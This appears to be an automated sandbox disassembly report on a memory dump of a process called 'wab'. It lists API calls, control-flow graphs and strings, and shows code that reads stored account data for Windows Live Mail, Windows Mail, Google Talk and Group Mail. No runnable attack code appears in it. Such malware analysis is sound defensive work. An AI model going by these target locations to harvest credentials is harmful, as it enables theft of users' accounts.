                                                                                                                                                                                          control_flow_graph 249 44412e-44414a call 44431c GetModuleHandleA 252 44414c-444157 249->252 253 44416b-44416e 249->253 252->253 254 444159-444162 252->254 255 444197-4441e4 __set_app_type __p__fmode __p__commode call 444318 253->255 256 444164-444169 254->256 257 444183-444187 254->257 264 4441e6-4441f1 __setusermatherr 255->264 265 4441f2-44424c call 444306 _initterm __getmainargs _initterm 255->265 256->253 259 444170-444177 256->259 257->253 260 444189-44418b 257->260 259->253 262 444179-444181 259->262 263 444191-444194 260->263 262->263 263->255 264->265 268 44424e-444256 265->268 269 444288-44428b 265->269 270 44425c-44425f 268->270 271 444258-44425a 268->271 272 444265-444269 269->272 273 44428d-444291 269->273 270->272 274 444261-444262 270->274 271->268 271->270 275 44426f-444280 GetStartupInfoA 272->275 276 44426b-44426d 272->276 273->269 274->272 277 444282-444286 275->277 278 444293-444295 275->278 276->274 276->275 279 444296-4442aa GetModuleHandleA call 40cc66 277->279 278->279 282 4442b3-4442f3 _cexit call 444355 279->282 283 4442ac-4442ad exit 279->283 283->282
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3662548030-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 004437F8
                                                                                                                                                                                            • Part of subcall function 0040732D: strlen.MSVCRT ref: 0040732F
                                                                                                                                                                                            • Part of subcall function 0040732D: strlen.MSVCRT ref: 0040733A
                                                                                                                                                                                            • Part of subcall function 0040732D: _mbscat.MSVCRT ref: 00407351
                                                                                                                                                                                            • Part of subcall function 0041072B: memset.MSVCRT ref: 00410780
                                                                                                                                                                                            • Part of subcall function 0041072B: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 004107E9
                                                                                                                                                                                            • Part of subcall function 0041072B: _mbscpy.MSVCRT ref: 004107F7
                                                                                                                                                                                          • memset.MSVCRT ref: 00443866
                                                                                                                                                                                          • memset.MSVCRT ref: 00443881
                                                                                                                                                                                            • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004438BA
                                                                                                                                                                                          • strlen.MSVCRT ref: 004438C8
                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 004438EE
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • \Microsoft\Windows Live Mail, xrefs: 0044383D
                                                                                                                                                                                          • Software\Microsoft\Windows Live Mail, xrefs: 00443897
                                                                                                                                                                                          • Store Root, xrefs: 00443892
                                                                                                                                                                                          • \Microsoft\Windows Mail, xrefs: 00443816
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                                                                                                                                                                                          • API String ID: 832325562-2578778931
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          control_flow_graph 308 40edd5-40ef32 memset * 2 call 407649 * 2 RegOpenKeyExA 313 40ef38-40ef5f RegQueryValueExA 308->313 314 40f04e-40f054 308->314 315 40f045-40f048 RegCloseKey 313->315 316 40ef65-40ef69 313->316 315->314 316->315 317 40ef6f-40ef79 316->317 318 40ef7b-40ef8d call 404666 call 40472f 317->318 319 40efec 317->319 329 40efdf-40efea call 404780 318->329 330 40ef8f-40efb3 call 4047a0 318->330 320 40efef-40eff2 319->320 320->315 322 40eff4-40f034 call 4012ee RegQueryValueExA 320->322 322->315 328 40f036-40f044 322->328 328->315 329->320 330->329 335 40efb5-40efb8 330->335 336 40efd6-40efd9 LocalFree 335->336 337 40efba-40efcf memcpy 335->337 336->329 337->336
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0040EEDC
                                                                                                                                                                                          • memset.MSVCRT ref: 0040EEF4
                                                                                                                                                                                            • Part of subcall function 00407649: _mbsnbcat.MSVCRT ref: 00407669
                                                                                                                                                                                          • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040EF2A
                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040EF57
                                                                                                                                                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F02C
                                                                                                                                                                                            • Part of subcall function 00404666: _mbscpy.MSVCRT ref: 004046B5
                                                                                                                                                                                            • Part of subcall function 0040472F: LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                            • Part of subcall function 0040472F: GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                          • memcpy.MSVCRT ref: 0040EFC7
                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040EFD9
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F048
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2012582556-3916222277
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 004037DD
                                                                                                                                                                                          • memset.MSVCRT ref: 004037F1
                                                                                                                                                                                            • Part of subcall function 00443A35: memset.MSVCRT ref: 00443A57
                                                                                                                                                                                            • Part of subcall function 00443A35: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00443AC3
                                                                                                                                                                                            • Part of subcall function 00406CA4: strlen.MSVCRT ref: 00406CA9
                                                                                                                                                                                            • Part of subcall function 00406CA4: memcpy.MSVCRT ref: 00406CBE
                                                                                                                                                                                          • strchr.MSVCRT ref: 00403860
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 0040387D
                                                                                                                                                                                          • strlen.MSVCRT ref: 00403889
                                                                                                                                                                                          • sprintf.MSVCRT ref: 004038A9
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004038BF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                                                                                                                                                                                          • String ID: %s@yahoo.com
                                                                                                                                                                                          • API String ID: 317221925-3288273942
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 004034F6
                                                                                                                                                                                          • memset.MSVCRT ref: 0040350C
                                                                                                                                                                                            • Part of subcall function 00410493: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 004104CC
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 00403547
                                                                                                                                                                                            • Part of subcall function 00406AF3: strlen.MSVCRT ref: 00406AF4
                                                                                                                                                                                            • Part of subcall function 00406AF3: _mbscat.MSVCRT ref: 00406B0B
                                                                                                                                                                                          • _mbscat.MSVCRT ref: 0040355F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _mbscatmemset$Close_mbscpystrlen
                                                                                                                                                                                          • String ID: InstallPath$Software\Group Mail$fb.dat
                                                                                                                                                                                          • API String ID: 3071782539-966475738
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2054149589-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00408043: memset.MSVCRT ref: 004080A5
                                                                                                                                                                                            • Part of subcall function 00408043: memset.MSVCRT ref: 004080B9
                                                                                                                                                                                            • Part of subcall function 00408043: memset.MSVCRT ref: 004080D3
                                                                                                                                                                                            • Part of subcall function 00408043: memset.MSVCRT ref: 004080E8
                                                                                                                                                                                            • Part of subcall function 00408043: GetComputerNameA.KERNEL32(?,?), ref: 0040810A
                                                                                                                                                                                            • Part of subcall function 00408043: GetUserNameA.ADVAPI32(?,?), ref: 0040811E
                                                                                                                                                                                            • Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 0040813D
                                                                                                                                                                                            • Part of subcall function 00408043: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00408152
                                                                                                                                                                                            • Part of subcall function 00408043: strlen.MSVCRT ref: 0040815B
                                                                                                                                                                                            • Part of subcall function 00408043: strlen.MSVCRT ref: 0040816A
                                                                                                                                                                                            • Part of subcall function 00408043: memcpy.MSVCRT ref: 0040817C
                                                                                                                                                                                            • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                          • memset.MSVCRT ref: 00408392
                                                                                                                                                                                            • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                                                                                                                                                                          • memset.MSVCRT ref: 004083E3
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?), ref: 00408421
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 00408448
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Software\Google\Google Talk\Accounts, xrefs: 00408363
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUsermemcpy
                                                                                                                                                                                          • String ID: Software\Google\Google Talk\Accounts
                                                                                                                                                                                          • API String ID: 2959138223-1079885057
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Cursor_mbsicmpqsort
                                                                                                                                                                                          • String ID: /nosort$/sort
                                                                                                                                                                                          • API String ID: 882979914-1578091866
                                                                                                                                                                                          • Opcode ID: 3fd05ea3d2e473999241c6e710ee6662cc18b56f225bb7025ede358bdfc82e44
                                                                                                                                                                                          • Instruction ID: 59731eef90b6f0024c6c95bb6f71fb6a55e53d5caa10bc7ba91746e522f0a21b
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3fd05ea3d2e473999241c6e710ee6662cc18b56f225bb7025ede358bdfc82e44
                                                                                                                                                                                          • Instruction Fuzzy Hash: AF21C4B1704501EFD719AB75C880AA9F3A8FF88314F21013EF419A7292C738B8118B99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          control_flow_graph 445 41072b-410742 call 41067e 448 410744-41074d call 406e4c 445->448 449 41076d-41078b memset 445->449 457 41074f-410752 448->457 458 41075e-410761 448->458 451 410797-4107a5 449->451 452 41078d-410790 449->452 453 4107b5-4107bf call 410411 451->453 452->451 455 410792-410795 452->455 462 4107c1-4107e9 call 4106ad call 410452 RegCloseKey 453->462 463 4107ef-410802 _mbscpy 453->463 455->451 459 4107a7-4107b0 455->459 457->449 461 410754-410757 457->461 465 410768 458->465 459->453 461->449 464 410759-41075c 461->464 462->463 467 410805-410807 463->467 464->449 464->458 465->467
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0041067E: LoadLibraryA.KERNEL32(shell32.dll,0041073A,00000104), ref: 0041068C
                                                                                                                                                                                            • Part of subcall function 0041067E: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004106A1
                                                                                                                                                                                          • memset.MSVCRT ref: 00410780
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 004107E9
                                                                                                                                                                                          • _mbscpy.MSVCRT ref: 004107F7
                                                                                                                                                                                            • Part of subcall function 00406E4C: GetVersionExA.KERNEL32(00451168,0000001A,00410749,00000104), ref: 00406E66
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 0041079B, 004107AB
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressCloseLibraryLoadProcVersion_mbscpymemset
                                                                                                                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                                                                                                          • API String ID: 889583718-2036018995
                                                                                                                                                                                          • Opcode ID: 24424f8fb7c37ab6dcf975350972c994308c6069d3110df9dc8122139225ba6f
                                                                                                                                                                                          • Instruction ID: 55274f9b0d4144c5a5f6b064647028c43f69cf0431b3c32ec78c32e38a1c383e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 24424f8fb7c37ab6dcf975350972c994308c6069d3110df9dc8122139225ba6f
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2811D071C00218FBEB24F6948C85EEF77AC9B15304F1400B7F95161192E6B99ED4CA99
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindResourceA.KERNEL32(?,?,?), ref: 004105EA
                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 004105FB
                                                                                                                                                                                          • LoadResource.KERNEL32(?,00000000), ref: 0041060B
                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 00410616
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3473537107-0
                                                                                                                                                                                          • Opcode ID: aa79f82f4ecfd8f7b628c1d7de4cc48f572b3be46360eaed4676304fbba1ef3c
                                                                                                                                                                                          • Instruction ID: 4a68303d5b5253afd20c9a06ef53f1b3f3171458fb19c91adc6236e38678b247
                                                                                                                                                                                          • Opcode Fuzzy Hash: aa79f82f4ecfd8f7b628c1d7de4cc48f572b3be46360eaed4676304fbba1ef3c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 88019636600315AB8F155F65DC4599F7FAAFFD63917088036F909CA361D7B1C891C68C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • memset.MSVCRT ref: 0041036C
                                                                                                                                                                                            • Part of subcall function 0040735C: sprintf.MSVCRT ref: 00407394
                                                                                                                                                                                            • Part of subcall function 0040735C: memcpy.MSVCRT ref: 004073A7
                                                                                                                                                                                          • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00410390
                                                                                                                                                                                          • memset.MSVCRT ref: 004103A7
                                                                                                                                                                                          • GetPrivateProfileStringA.KERNEL32(?,?,0044551F,?,00002000,?), ref: 004103C5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PrivateProfileStringmemset$Writememcpysprintf
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3143880245-0
                                                                                                                                                                                          • Opcode ID: 300669213aa10e30692949e2fcfbaed099003638c554249b47492bf17e1db58e
                                                                                                                                                                                          • Instruction ID: 9d0f41c8c3888dc292d70de46467aaf9ffb36b28435196f73ffda5293cd27e0f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 300669213aa10e30692949e2fcfbaed099003638c554249b47492bf17e1db58e
                                                                                                                                                                                          • Instruction Fuzzy Hash: B501847280431DBFEF116F60EC89EDB7B79EF04314F1000A6FA08A2052D6759D64DB69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??2@
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1033339047-0
                                                                                                                                                                                          • Opcode ID: c9d9b14cbc3cffdefcd651bca10b6be545bbad424ff6817e9a729584ede19952
                                                                                                                                                                                          • Instruction ID: 91b6e48186620c166d1d4af44a265f78501a0d7a4e3c1a8b362a1fb29a74aa2a
                                                                                                                                                                                          • Opcode Fuzzy Hash: c9d9b14cbc3cffdefcd651bca10b6be545bbad424ff6817e9a729584ede19952
                                                                                                                                                                                          • Instruction Fuzzy Hash: 17F0F9B5901300AFE7549B3CED0672676E4E75C356F04983FA30A8A2F2EB79C8448B08
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ??3@mallocmemcpy
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3831604043-0
                                                                                                                                                                                          • Opcode ID: 6dc2a86f1fe2ee347426ab0121a461cac49b5a84b0ae56981e7af52698dffbe8
                                                                                                                                                                                          • Instruction ID: 120c5a36fa875b11696935209168df4f9df621bec9a22d80de65970bbd8b26ad
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6dc2a86f1fe2ee347426ab0121a461cac49b5a84b0ae56981e7af52698dffbe8
                                                                                                                                                                                          • Instruction Fuzzy Hash: 13F0E9727053225FD708EB75B94184B73DDAF84324712482FF505E7282D7389C60CB59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00406D65: memset.MSVCRT ref: 00406D6F
                                                                                                                                                                                            • Part of subcall function 00406D65: _mbscpy.MSVCRT ref: 00406DAF
                                                                                                                                                                                          • CreateFontIndirectA.GDI32(?), ref: 00406E44
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateFontIndirect_mbscpymemset
                                                                                                                                                                                          • String ID: Arial
                                                                                                                                                                                          • API String ID: 3853255127-493054409
                                                                                                                                                                                          • Opcode ID: af81b5a79715ac1c537919aec0876ca352f4b846121989fe158db9d7d4b71e29
                                                                                                                                                                                          • Instruction ID: b68263c9f29210b4531b01fb65f498acbd183b68a5d206dac463ad1e531dcf8e
                                                                                                                                                                                          • Opcode Fuzzy Hash: af81b5a79715ac1c537919aec0876ca352f4b846121989fe158db9d7d4b71e29
                                                                                                                                                                                          • Instruction Fuzzy Hash: FFD0C974E4020C67DA10B7A0FC07F49776C5B01705F510421B901B10E2EAA4A15886D9
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00401E60: memset.MSVCRT ref: 00401E82
                                                                                                                                                                                            • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401E9B
                                                                                                                                                                                            • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EA9
                                                                                                                                                                                            • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EEF
                                                                                                                                                                                            • Part of subcall function 00401E60: strlen.MSVCRT ref: 00401EFD
                                                                                                                                                                                          • _strcmpi.MSVCRT ref: 0040CBE4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: strlen$_strcmpimemset
                                                                                                                                                                                          • String ID: /stext
                                                                                                                                                                                          • API String ID: 520177685-3817206916
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000078,00000004,?,00000000,00000000,00444A5C,00444A45), ref: 00444A7E
                                                                                                                                                                                          • VirtualProtect.KERNELBASE(?,00000078,?,?,?,00000000,00000000,00444A5C,00444A45), ref: 00444A92
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ProtectVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 544645111-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00404780: FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                                                                                                                                                                          • LoadLibraryA.KERNELBASE(?,0040F08A,?,00000000), ref: 00404737
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 0040474F
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Library$AddressFreeLoadProc
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 145871493-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00410407
                                                                                                                                                                                            • Part of subcall function 004102F8: memset.MSVCRT ref: 00410316
                                                                                                                                                                                            • Part of subcall function 004102F8: _itoa.MSVCRT ref: 0041032D
                                                                                                                                                                                            • Part of subcall function 004102F8: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 0041033C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: PrivateProfile$StringWrite_itoamemset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4165544737-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000B.00000002.35547049122.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_11_2_400000_wab.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3664257935-0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
